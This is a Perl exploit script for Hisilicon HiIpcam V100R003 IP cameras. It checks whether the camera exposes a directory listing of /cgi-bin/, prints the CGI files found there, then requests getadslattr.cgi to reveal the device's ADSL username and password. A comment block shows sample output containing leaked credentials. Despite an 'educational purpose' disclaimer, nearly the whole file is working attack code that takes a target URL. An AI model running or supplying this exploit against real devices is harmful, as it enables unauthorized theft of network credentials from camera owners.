#!/usr/bin/perl -w
#
#  Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure
#
#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
#	#  [ 
#	#  [ Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure
#	#  [ =============================================================
#	#  [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
#	#  [
#	#  [  Disclaimer:
#	#  [  This or previous programs are for Educational purpose
#	#  [  ONLY. Do not use it without permission. The usual 
#	#  [  disclaimer applies, especially the fact that Todor Donev
#	#  [  is not liable for any damages caused by direct or 
#	#  [  indirect use of the  information or functionality provided
#	#  [  by these programs. The author or any Internet provider 
#	#  [  bears NO responsibility for content or misuse of these 
#	#  [  programs or any derivatives thereof. By using these programs 
#	#  [  you accept the fact that any damage (dataloss, system crash, 
#	#  [  system compromise, etc.) caused by the use  of these programs
#	#  [  are not Todor Donev's responsibility.
#	#  [   
#	#  [ Use them at your own risk!
#	#  [
#	#  [ Initializing the browser
#	#  [ Server: thttpd/2.25b 29dec2003
#	#  [ The target is vulnerable
#	#  [
#	#  [ Directory Traversal
#	#  [
#	#  [ /cgi-bin/..
#	#  [ /cgi-bin/adsl_init.cgi
#	#  [ /cgi-bin/chkwifi.cgi
#	#  [ /cgi-bin/ddns_start.cgi
#	#  [ /cgi-bin/getadslattr.cgi
#	#  [ /cgi-bin/getddnsattr.cgi
#	#  [ /cgi-bin/getinetattr.cgi
#	#  [ /cgi-bin/getinterip.cgi
#	#  [ /cgi-bin/getnettype.cgi
#	#  [ /cgi-bin/getupnp.cgi
#	#  [ /cgi-bin/getwifi.cgi
#	#  [ /cgi-bin/getwifiattr.cgi
#	#  [ /cgi-bin/ptzctrldown.cgi
#	#  [ /cgi-bin/ptzctrlleft.cgi
#	#  [ /cgi-bin/ptzctrlright.cgi
#	#  [ /cgi-bin/ptzctrlup.cgi
#	#  [ /cgi-bin/ptzctrlzoomin.cgi
#	#  [ /cgi-bin/ptzctrlzoomout.cgi
#	#  [ /cgi-bin/ser.cgi
#	#  [ /cgi-bin/setadslattr.cgi
#	#  [ /cgi-bin/setddnsattr.cgi
#	#  [ /cgi-bin/setinetattr.cgi
#	#  [ /cgi-bin/setwifiattr.cgi
#	#  [ /cgi-bin/testwifi.cgi
#	#  [ /cgi-bin/upnp_start.cgi
#	#  [ /cgi-bin/upnp_stop.cgi
#	#  [ /cgi-bin/wifi_start.cgi
#	#  [ /cgi-bin/wifi_stop.cgi
#	#  [ 
#	#  [ File Reading
#	#  [
#	#  [ var ip = "" ;
#	#  [ var adslenable = "" ;
#	#  [ var username = "hacker" ;
#	#  [ var password = "133337" ;
#	#  [ var dnsauto = "1" ;
#	#  [ var dns1 = "8.8.8.8" ;
#	#  [ var dns2 = "8.8.4.4" ;
#
# 
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use HTML::TreeBuilder;
$| = 1;
my $host = shift || 'https://192.168.1.1/'; # Full path url to the store
print "\033[2J";    #clear the screen
print "\033[0;0H"; #jump to 0,0

my $banner =  "\x5b\x20\x0a\x5b\x20\x48\x69\x73\x69\x6c\x69\x63\x6f\x6e\x20\x48\x69\x49\x70\x63\x61\x6d\x20\x56\x31\x30\x30\x52\x30\x30\x33\x20\x52\x65\x6d\x6f\x74\x65\x20\x41\x44\x53\x4c\x20\x43\x72\x65\x64\x65\x6e\x74\x69\x61\x6c\x73\x20\x44\x69\x73\x63\x6c\x6f\x73\x75\x72\x65\x0a\x5b\x20\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x5b\x20\x45\x78\x70\x6c\x6f\x69\x74\x20\x41\x75\x74\x68\x6f\x72\x3a\x20\x54\x6f\x64\x6f\x72\x20\x44\x6f\x6e\x65\x76\x20\x32\x30\x31\x39\x20\x3c\x74\x6f\x64\x6f\x72\x2e\x64\x6f\x6e\x65\x76\x40\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x3e\x0a\x5b\x0a\x5b\x20\x20\x44\x69\x73\x63\x6c\x61\x69\x6d\x65\x72\x3a\x0a\x5b\x20\x20\x54\x68\x69\x73\x20\x6f\x72\x20\x70\x72\x65\x76\x69\x6f\x75\x73\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x20\x61\x72\x65\x20\x66\x6f\x72\x20\x45\x64\x75\x63\x61\x74\x69\x6f\x6e\x61\x6c\x20\x70\x75\x72\x70\x6f\x73\x65\x0a\x5b\x20\x20\x4f\x4e\x4c\x59\x2e\x20\x44\x6f\x20\x6e\x6f\x74\x20\x75\x73\x65\x20\x69\x74\x20\x77\x69\x74\x68\x6f\x75\x74\x20\x70\x65\x72\x6d\x69\x73\x73\x69\x6f\x6e\x2e\x20\x54\x68\x65\x20\x75\x73\x75\x61\x6c\x20\x0a\x5b\x20\x20\x64\x69\x73\x63\x6c\x61\x69\x6d\x65\x72\x20\x61\x70\x70\x6c\x69\x65\x73\x2c\x20\x65\x73\x70\x65\x63\x69\x61\x6c\x6c\x79\x20\x74\x68\x65\x20\x66\x61\x63\x74\x20\x74\x68\x61\x74\x20\x54\x6f\x64\x6f\x72\x20\x44\x6f\x6e\x65\x76\x0a\x5b\x20\x20\x69\x73\x20\x6e\x6f\x74\x20\x6c\x69\x61\x62\x6c\x65\x20\x66\x6f\x72\x20\x61\x6e\x79\x20\x64\x61\x6d\x61\x67\x65\x73\x20\x63\x61\x75\x73\x65\x64\x20\x62\x79\x20\x64\x69\x72\x65\x63\x74\x20\x6f\x72\x20\x0a\x5b\x20\x20\x69\x6e\x64\x69\x72\x65\x63\x74\x20\x75\x73\x65\x20\x6f\x66\x20\x74\x68\x65\x20\x20\x69\x6e\x66\x6f\x72\x6d\x61\x74\x69\x6f\x6e\x20\x6f\x72\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x61\x6c\x69\x74\x79\x20\x70\x72\x6f\x76\x69\x64\x65\x64\x0a\x5b\x20\x20\x62\x79\x20\x74\x68\x65\x73\x65\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x2e\x20\x54\x68\x65\x20\x61\x75\x74\x68\x6f\x72\x20\x6f\x72\x20\x61\x6e\x79\x20\x49\x6e\x74\x65\x72\x6e\x65\x74\x20\x70\x72\x6f\x76\x69\x64\x65\x72\x20\x0a\x5b\x20\x20\x62\x65\x61\x72\x73\x20\x4e\x4f\x20\x72\x65\x73\x70\x6f\x6e\x73\x69\x62\x69\x6c\x69\x74\x79\x20\x66\x6f\x72\x20\x63\x6f\x6e\x74\x65\x6e\x74\x20\x6f\x72\x20\x6d\x69\x73\x75\x73\x65\x20\x6f\x66\x20\x74\x68\x65\x73\x65\x20\x0a\x5b\x20\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x20\x6f\x72\x20\x61\x6e\x79\x20\x64\x65\x72\x69\x76\x61\x74\x69\x76\x65\x73\x20\x74\x68\x65\x72\x65\x6f\x66\x2e\x20\x42\x79\x20\x75\x73\x69\x6e\x67\x20\x74\x68\x65\x73\x65\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x20\x0a\x5b\x20\x20\x79\x6f\x75\x20\x61\x63\x63\x65\x70\x74\x20\x74\x68\x65\x20\x66\x61\x63\x74\x20\x74\x68\x61\x74\x20\x61\x6e\x79\x20\x64\x61\x6d\x61\x67\x65\x20\x28\x64\x61\x74\x61\x6c\x6f\x73\x73\x2c\x20\x73\x79\x73\x74\x65\x6d\x20\x63\x72\x61\x73\x68\x2c\x20\x0a\x5b\x20\x20\x73\x79\x73\x74\x65\x6d\x20\x63\x6f\x6d\x70\x72\x6f\x6d\x69\x73\x65\x2c\x20\x65\x74\x63\x2e\x29\x20\x63\x61\x75\x73\x65\x64\x20\x62\x79\x20\x74\x68\x65\x20\x75\x73\x65\x20\x20\x6f\x66\x20\x74\x68\x65\x73\x65\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x0a\x5b\x20\x20\x61\x72\x65\x20\x6e\x6f\x74\x20\x54\x6f\x64\x6f\x72\x20\x44\x6f\x6e\x65\x76\x27\x73\x20\x72\x65\x73\x70\x6f\x6e\x73\x69\x62\x69\x6c\x69\x74\x79\x2e\x0a\x5b\x20\x20\x20\x0a\x5b\x20\x55\x73\x65\x20\x74\x68\x65\x6d\x20\x61\x74\x20\x79\x6f\x75\x72\x20\x6f\x77\x6e\x20\x72\x69\x73\x6b\x21\x0a\x5b\x0a";

print $banner;

print "[ e.g. perl $0 https://target:port/\n" and exit if ($host !~ m/^http/);
print "[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");
my $browser  = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
   $browser->timeout(30);
   $browser->agent($user_agent);
my $target = $host."/cgi-bin/";
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);                      
my $response = $browser->request($request) or die "[ Exploit Failed: $!";
print "[ 401 Unauthorized!\n" and exit if ($response->code eq '401');
print "[ Server: ", $response->header('Server'), "\n";
if (defined ($response->as_string()) && ($response->as_string() =~ m/<H2>Index of \/cgi-bin\/<\/H2>/)){
    print "[ The target is vulnerable\n";
    print "[\n[ Directory Traversal\n";
    my $tree = HTML::TreeBuilder->new_from_content($response->as_string());
    my @files = $tree->look_down(_tag => 'a');
    print "[ ", $_->attr('href'), "\n" for @files;
    my $target = $host."/cgi-bin/getadslattr.cgi";
    my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);
    my $response = $browser->request($request) or die "[ Exploit Failed: $!";
    print "[\n[ File Reading\n";
    print "[ ", $_, "\n" for split(/\n/,$response->content());

} else { 
        print "[ Exploit failed! The target isn't vulnerable\n";
        exit;
}